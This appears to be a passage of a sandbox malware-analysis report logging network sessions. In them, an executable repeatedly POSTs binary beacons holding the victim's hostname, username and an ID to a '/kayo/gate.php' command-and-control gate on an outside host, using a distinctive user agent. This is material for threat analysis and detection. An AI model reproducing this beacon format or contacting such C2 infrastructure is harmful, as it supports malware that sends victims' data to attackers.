                                            Apr 29, 2021 09:19:51.565548897 CEST | 6061 | OUT | POST /kayo/gate.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: amrp.tw
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: FC7C64DA
                                            Content-Length: 163
                                            Connection: close
                                            Apr 29, 2021 09:19:51.815906048 CEST | 6061 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                            Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Apr 29, 2021 09:19:52.284795046 CEST | 6061 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Thu, 29 Apr 2021 07:19:52 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Connection: close
                                            Vary: Accept-Encoding
                                            X-Powered-By: PHP/5.6.40
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            51 | 192.168.2.3 | 49787 | 35.247.234.230 | 80 | C:\Users\user\Desktop\FJbeidnZOF.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Apr 29, 2021 09:19:52.973608971 CEST | 6062 | OUT | POST /kayo/gate.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: amrp.tw
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: FC7C64DA
                                            Content-Length: 163
                                            Connection: close
                                            Apr 29, 2021 09:19:53.221429110 CEST | 6062 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                            Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Apr 29, 2021 09:19:53.686990023 CEST | 6063 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Thu, 29 Apr 2021 07:19:54 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Connection: close
                                            Vary: Accept-Encoding
                                            X-Powered-By: PHP/5.6.40
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            52 | 192.168.2.3 | 49788 | 35.247.234.230 | 80 | C:\Users\user\Desktop\FJbeidnZOF.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Apr 29, 2021 09:19:54.367481947 CEST | 6063 | OUT | POST /kayo/gate.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: amrp.tw
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: FC7C64DA
                                            Content-Length: 163
                                            Connection: close
                                            Apr 29, 2021 09:19:54.615892887 CEST | 6064 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                            Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Apr 29, 2021 09:19:55.080667973 CEST | 6064 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Thu, 29 Apr 2021 07:19:55 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Connection: close
                                            Vary: Accept-Encoding
                                            X-Powered-By: PHP/5.6.40
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            53 | 192.168.2.3 | 49789 | 35.247.234.230 | 80 | C:\Users\user\Desktop\FJbeidnZOF.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Apr 29, 2021 09:19:56.496992111 CEST | 6065 | OUT | POST /kayo/gate.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: amrp.tw
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: FC7C64DA
                                            Content-Length: 163
                                            Connection: close
                                            Apr 29, 2021 09:19:56.742147923 CEST | 6065 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                            Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Apr 29, 2021 09:19:57.222807884 CEST | 6065 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Thu, 29 Apr 2021 07:19:57 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Connection: close
                                            Vary: Accept-Encoding
                                            X-Powered-By: PHP/5.6.40
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            54 | 192.168.2.3 | 49790 | 35.247.234.230 | 80 | C:\Users\user\Desktop\FJbeidnZOF.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Apr 29, 2021 09:19:57.722593069 CEST | 6066 | OUT | POST /kayo/gate.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: amrp.tw
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: FC7C64DA
                                            Content-Length: 163
                                            Connection: close
                                            Apr 29, 2021 09:19:57.968847990 CEST | 6066 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                            Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Apr 29, 2021 09:19:58.434159994 CEST | 6067 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Thu, 29 Apr 2021 07:19:58 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Connection: close
                                            Vary: Accept-Encoding
                                            X-Powered-By: PHP/5.6.40
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            55 | 192.168.2.3 | 49791 | 35.247.234.230 | 80 | C:\Users\user\Desktop\FJbeidnZOF.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Apr 29, 2021 09:19:58.937624931 CEST | 6067 | OUT | POST /kayo/gate.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: amrp.tw
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: FC7C64DA
                                            Content-Length: 163
                                            Connection: close
                                            Apr 29, 2021 09:19:59.183995008 CEST | 6068 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                            Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Apr 29, 2021 09:19:59.738395929 CEST | 6068 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Thu, 29 Apr 2021 07:20:00 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Connection: close
                                            Vary: Accept-Encoding
                                            X-Powered-By: PHP/5.6.40
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            56 | 192.168.2.3 | 49792 | 35.247.234.230 | 80 | C:\Users\user\Desktop\FJbeidnZOF.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Apr 29, 2021 09:20:00.214624882 CEST | 6069 | OUT | POST /kayo/gate.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: amrp.tw
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: FC7C64DA
                                            Content-Length: 163
                                            Connection: close
                                            Apr 29, 2021 09:20:00.461215019 CEST | 6069 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                            Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Apr 29, 2021 09:20:00.943799019 CEST | 6069 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Thu, 29 Apr 2021 07:20:01 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Connection: close
                                            Vary: Accept-Encoding
                                            X-Powered-By: PHP/5.6.40
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            57 | 192.168.2.3 | 49793 | 35.247.234.230 | 80 | C:\Users\user\Desktop\FJbeidnZOF.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Apr 29, 2021 09:20:01.445743084 CEST | 6070 | OUT | POST /kayo/gate.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: amrp.tw
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: FC7C64DA
                                            Content-Length: 163
                                            Connection: close
                                            Apr 29, 2021 09:20:01.691780090 CEST | 6071 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                            Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Apr 29, 2021 09:20:02.163347960 CEST | 6072 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Thu, 29 Apr 2021 07:20:02 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Connection: close
                                            Vary: Accept-Encoding
                                            X-Powered-By: PHP/5.6.40
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            58 | 192.168.2.3 | 49794 | 35.247.234.230 | 80 | C:\Users\user\Desktop\FJbeidnZOF.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Apr 29, 2021 09:20:02.645327091 CEST | 6073 | OUT | POST /kayo/gate.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: amrp.tw
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: FC7C64DA
                                            Content-Length: 163
                                            Connection: close
                                            Apr 29, 2021 09:20:02.891839981 CEST | 6073 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                            Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Apr 29, 2021 09:20:03.360308886 CEST | 6073 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Thu, 29 Apr 2021 07:20:03 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Connection: close
                                            Vary: Accept-Encoding
                                            X-Powered-By: PHP/5.6.40
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            59 | 192.168.2.3 | 49795 | 35.247.234.230 | 80 | C:\Users\user\Desktop\FJbeidnZOF.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Apr 29, 2021 09:20:03.844490051 CEST | 6074 | OUT | POST /kayo/gate.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: amrp.tw
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: FC7C64DA
                                            Content-Length: 163
                                            Connection: close
                                            Apr 29, 2021 09:20:04.093413115 CEST | 6074 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                            Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Apr 29, 2021 09:20:04.563808918 CEST | 6075 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Thu, 29 Apr 2021 07:20:04 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Connection: close
                                            Vary: Accept-Encoding
                                            X-Powered-By: PHP/5.6.40
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            6 | 192.168.2.3 | 49731 | 35.247.234.230 | 80 | C:\Users\user\Desktop\FJbeidnZOF.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Apr 29, 2021 09:18:52.333277941 CEST | 1155 | OUT | POST /kayo/gate.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: amrp.tw
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: FC7C64DA
                                            Content-Length: 163
                                            Connection: close
                                            Apr 29, 2021 09:18:52.578893900 CEST | 1162 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                            Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Apr 29, 2021 09:18:53.048599005 CEST | 1164 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Thu, 29 Apr 2021 07:18:53 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Connection: close
                                            Vary: Accept-Encoding
                                            X-Powered-By: PHP/5.6.40
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            60 | 192.168.2.3 | 49796 | 35.247.234.230 | 80 | C:\Users\user\Desktop\FJbeidnZOF.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Apr 29, 2021 09:20:05.062419891 CEST | 6075 | OUT | POST /kayo/gate.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: amrp.tw
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: FC7C64DA
                                            Content-Length: 163
                                            Connection: close
                                            Apr 29, 2021 09:20:05.308382034 CEST | 6076 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                            Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Apr 29, 2021 09:20:05.782468081 CEST | 6076 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Thu, 29 Apr 2021 07:20:06 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Connection: close
                                            Vary: Accept-Encoding
                                            X-Powered-By: PHP/5.6.40
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID: 61 | Source IP: 192.168.2.3 | Source Port: 49797 | Destination IP: 35.247.234.230 | Destination Port: 80 | Process: C:\Users\user\Desktop\FJbeidnZOF.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Apr 29, 2021 09:20:06.256647110 CEST | 6077 | OUT | POST /kayo/gate.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: amrp.tw
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: FC7C64DA
                                            Content-Length: 163
                                            Connection: close
                                            Apr 29, 2021 09:20:06.501842022 CEST | 6077 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                            Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Apr 29, 2021 09:20:07.193867922 CEST | 6077 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Thu, 29 Apr 2021 07:20:07 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Connection: close
                                            Vary: Accept-Encoding
                                            X-Powered-By: PHP/5.6.40
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID: 62 | Source IP: 192.168.2.3 | Source Port: 49798 | Destination IP: 35.247.234.230 | Destination Port: 80 | Process: C:\Users\user\Desktop\FJbeidnZOF.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Apr 29, 2021 09:20:07.682910919 CEST | 6078 | OUT | POST /kayo/gate.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: amrp.tw
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: FC7C64DA
                                            Content-Length: 163
                                            Connection: close
                                            Apr 29, 2021 09:20:07.932044983 CEST | 6078 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                            Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Apr 29, 2021 09:20:08.408574104 CEST | 6079 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Thu, 29 Apr 2021 07:20:08 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Connection: close
                                            Vary: Accept-Encoding
                                            X-Powered-By: PHP/5.6.40
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID: 63 | Source IP: 192.168.2.3 | Source Port: 49799 | Destination IP: 35.247.234.230 | Destination Port: 80 | Process: C:\Users\user\Desktop\FJbeidnZOF.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Apr 29, 2021 09:20:08.873402119 CEST | 6080 | OUT | POST /kayo/gate.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: amrp.tw
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: FC7C64DA
                                            Content-Length: 163
                                            Connection: close
                                            Apr 29, 2021 09:20:09.119581938 CEST | 6088 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                            Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Apr 29, 2021 09:20:09.595613956 CEST | 6089 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Thu, 29 Apr 2021 07:20:09 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Connection: close
                                            Vary: Accept-Encoding
                                            X-Powered-By: PHP/5.6.40
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID: 64 | Source IP: 192.168.2.3 | Source Port: 49801 | Destination IP: 35.247.234.230 | Destination Port: 80 | Process: C:\Users\user\Desktop\FJbeidnZOF.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Apr 29, 2021 09:20:10.078578949 CEST | 6089 | OUT | POST /kayo/gate.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: amrp.tw
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: FC7C64DA
                                            Content-Length: 163
                                            Connection: close
                                            Apr 29, 2021 09:20:10.327999115 CEST | 6092 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                            Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Apr 29, 2021 09:20:10.799532890 CEST | 6099 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Thu, 29 Apr 2021 07:20:11 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Connection: close
                                            Vary: Accept-Encoding
                                            X-Powered-By: PHP/5.6.40
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID: 65 | Source IP: 192.168.2.3 | Source Port: 49803 | Destination IP: 35.247.234.230 | Destination Port: 80 | Process: C:\Users\user\Desktop\FJbeidnZOF.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Apr 29, 2021 09:20:11.328697920 CEST | 6100 | OUT | POST /kayo/gate.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: amrp.tw
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: FC7C64DA
                                            Content-Length: 163
                                            Connection: close
                                            Apr 29, 2021 09:20:11.574177027 CEST | 6101 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                            Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Apr 29, 2021 09:20:12.041265965 CEST | 6101 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Thu, 29 Apr 2021 07:20:12 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Connection: close
                                            Vary: Accept-Encoding
                                            X-Powered-By: PHP/5.6.40
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID: 66 | Source IP: 192.168.2.3 | Source Port: 49804 | Destination IP: 35.247.234.230 | Destination Port: 80 | Process: C:\Users\user\Desktop\FJbeidnZOF.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Apr 29, 2021 09:20:12.553500891 CEST | 6102 | OUT | POST /kayo/gate.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: amrp.tw
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: FC7C64DA
                                            Content-Length: 163
                                            Connection: close
                                            Apr 29, 2021 09:20:12.802506924 CEST | 6102 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                            Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Apr 29, 2021 09:20:13.276144981 CEST | 6103 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Thu, 29 Apr 2021 07:20:13 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Connection: close
                                            Vary: Accept-Encoding
                                            X-Powered-By: PHP/5.6.40
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID: 67 | Source IP: 192.168.2.3 | Source Port: 49805 | Destination IP: 35.247.234.230 | Destination Port: 80 | Process: C:\Users\user\Desktop\FJbeidnZOF.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Apr 29, 2021 09:20:13.820240974 CEST | 6103 | OUT | POST /kayo/gate.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: amrp.tw
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: FC7C64DA
                                            Content-Length: 163
                                            Connection: close
                                            Apr 29, 2021 09:20:14.065867901 CEST | 6104 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                            Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Apr 29, 2021 09:20:14.527230978 CEST | 6104 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Thu, 29 Apr 2021 07:20:14 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Connection: close
                                            Vary: Accept-Encoding
                                            X-Powered-By: PHP/5.6.40
